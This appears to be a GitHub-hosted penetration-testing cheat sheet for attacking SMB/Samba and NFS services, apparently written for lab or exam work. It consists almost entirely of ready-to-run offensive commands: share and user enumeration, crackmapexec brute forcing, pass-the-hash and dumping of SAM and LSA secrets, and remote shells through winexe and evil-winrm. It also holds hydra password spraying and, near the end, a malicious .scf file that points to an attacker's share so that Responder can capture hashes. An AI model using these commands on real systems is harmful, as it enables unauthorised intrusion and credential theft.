-
Notifications
You must be signed in to change notification settings - Fork 1
/
mxsamba
159 lines (121 loc) · 4.96 KB
/
mxsamba
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
===================================
139/445 SMB Samba
sudo nmap -p 445 --script=smb-enum-shares,smb-enum-users 192.168.200.5
sudo nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-mbenum,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery,smb-vuln-regsvc-dos --script-args=unsafe=1 -T5 192.168.200.5 -p 445 | tee nmap-smb
===================================
First Checks
enum4linux -a 192.168.200.5
smbmap -H 192.168.200.5
smbmap -H 192.168.200.5 -u '' -p ''
smbclient -L 192.168.200.5
smbclient -L //192.168.200.5/ -U "guest"
smbclient -N -L \\\\192.168.200.5
smbclient //192.168.200.5/share -N
===================================
More
smbmap -H 192.168.200.5
smbmap -H 192.168.200.5 -u '' -p ''
smbmap -H 192.168.200.5 -R --depth 5
smbmap -H 192.168.200.5 -R share -A Groups.xml -q
smbmap -H 192.168.200.5 -u admin -p 'paxx' -d mike.com
smbclient -L 192.168.200.5
smbclient -L 192.168.200.5 -p12445
smbclient -L //192.168.200.5
smbclient -L //192.168.200.5/ -U "guest"
smbclient //192.168.200.5/share
smbclient //192.168.200.5/share -N
smbclient //192.168.200.5/share -U admin
smbclient \\\\192.168.200.5\\ipc$ -U admin
smbclient //192.168.200.5/secrets -U mike.com\\admin%paxxword
dir
mask ""
recurse ON
prompt OFF
mget *
===================================
Find Users
rpcclient 192.168.200.5 -U ''
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
==================================
crackmapexec --help
crackmapexec smb 192.168.200.5
crackmapexec smb 192.168.200.5 --shares -u '' -p ''
crackmapexec smb 192.168.200.5 --shares -u bob -p paxxword
crackmapexec winrm 192.168.200.5
crackmapexec winrm 192.168.200.5 -u bob -p 'paxxword'
crackmapexec smb 192.168.200.5 --pass-pol
crackmapexec smb 192.168.200.5 -u guest -p "" --shares
crackmapexec smb 192.168.200.5 -u guest -p "" -M spider_plus
Brute Force
crackmapexec smb 192.168.200.5 -d mydom -u users.txt -p pass.txt
Test Password, Get domain info
crackmapexec smb 192.168.200.5 -u bob -p 'paxxword' --local-auth
crackmapexec smb 192.168.200.5 10.1.1.1 -u bob -p 'paxxword' -d mydomain
crackmapexec smb 192.168.200.5 10.1.1.1 -u bob -H ntlmhash -d mydomain
crackmapexec smb 192.168.200.5 -u bob -p 'paxxword' --shares
crackmapexec smb 192.168.200.5 -d mydomain -u bob -H ntlmhash --sam
crackmapexec smb 192.168.200.5 -d mydomain -u bob -H ntlmhash --lsa
===================================
Samba Shell:
winexe -U username //192.168.200.5 "cmd.exe" --system
evil-winrm -i 192.168.200.5 -u bob -p paxxword
===================================
Reuse samba-creds for FTP
hydra -l steph -P $rockyou 192.168.200.5 ftp
===================================
NFS
showmount -e 192.168.200.5
sudo mkdir /tmp/bu
sudo mount -t nfs 192.168.200.5/backups /tmp/bu
sudo mount -t cifs "//192.168.200.5/backups" /mnt/bu
cd /tmp/bu
find | tee ~/lab/nfslist.txt
find | grep -i config
===================================
Pull All Share Names
smbclient -N -L \\\\192.168.200.5 | grep Disk | sed 's/^\s*\(.*\)\s*Disk.*/\1/'
Check All Shares
smbclient -N -L \\\\192.168.200.5 | grep Disk | sed 's/^\s*\(.*\)\s*Disk.*/\1/' | while read share; do echo "======${share}======"; smbclient -N "//192.168.200.5/${share}" -c dir; echo; done
mkdir /mnt/ds
mount -t cifs "//192.168.200.5/department" /mnt/ds
tree -l
find /dir -type f -follow -print|xargs ls -l
===================================
Test for 'Write' in Files and Directories
cd /mnt/ds
find . -type d | while read directory; do
touch ${directory}/mike 2>/dev/null && echo "${directory} - write file" && rm ${directory}/mike;
mkdir ${directory}/mike 2>/dev/null && echo "${directory} - write dir" && rmdir ${directory}/mike;
done
===================================
Create Variety of Filetypes
touch {/mnt/ds/archive/,./}mike.{lnk,exe,dll,ini}
touch {/mnt/ds/Users/Public/,./}mike.{lnk,exe,dll,ini}
Some are Deleted
watch -d "ls /mnt/Users/Public/*; ls /mnt/archive/mike*"
===================================
Files being Accessed/Deleted
Maybe we can exploit .scf when a 'User' opens the folder
Windows Explorer Shell Command files (.scf)
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
sudo python3 Responder.py -I tun 0
REF: ClientSideAttacks
cat test.txt
put test.txt
vim mike.scf
[Shell]
Command=2
IconFile=\\192.168.162.46\share\fav.ico
[Taskbar]
Command=ToggleDesktop
===================================
Found Creds - Reuse them
smbmap -H 192.168.200.5 -u bob -p paxxword
ldapdomaindump -u 'htb.local\bob' -p paxxword 192.168.200.5 -o ~/lab/ldap/
mount -t cifs -o username=bob,password=paxxword "//192.168.200.5/CertEnroll" /mnt/ds
ls -l mnt/ds/